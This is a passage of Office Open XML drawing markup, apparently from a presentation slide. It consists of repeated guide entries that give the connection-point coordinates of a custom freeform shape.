              <a:gd name="connsiteY16" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
